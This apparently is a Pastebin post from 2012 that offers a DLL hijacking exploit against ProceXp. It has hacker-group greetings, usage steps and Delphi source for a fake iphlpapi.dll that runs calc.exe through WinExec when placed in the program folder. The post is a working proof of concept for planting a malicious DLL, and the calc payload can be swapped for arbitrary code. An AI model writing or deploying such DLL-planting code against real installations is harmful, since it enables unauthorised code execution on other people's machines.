Advertisement
5rabq8

ProceXp DLL Hijacking Exploit (iphlpapi.dll)

Apr 9th, 2012
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. =============================================
  2. ProceXp DLL Hijacking Exploit (iphlpapi.dll)
  3. ==============================================
  4.  
  5. /*
  6. #ProceXp DLL Hijacking Exploit (iphlpapi.dll)
  7. #Author : Dr.5RaB
  8. #Greetz : 9Y3H.511 , HaCkErS eV!L , ViP 511 , , Sam7tk HaCkEr , Mr.Adis , Mr.JL6h , HmooDi , Dmar Al3no0oZ , Jn0n H4x0r , Dr.MeShAl , X-SHADOW
  9. #contact: Opl@live.com
  10. #Tested on: Windows 7 Ultimate
  11.  
  12. #How to use :
  13.  
  14. Take only the codes and put it in Delphi and Save by name (ProceXp DLL Hijacking Exploit (iphlpapi.dll)) and put it in the program folder
  15.  
  16. #iphlpapi.dll (code)
  17. */
  18.  
  19.  
  20. library Project2;
  21.  
  22. uses
  23. Windows;
  24. begin
  25. Winexec(PAnsichar('C:\windows\system32\calc.exe'),sw_show);
  26. end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement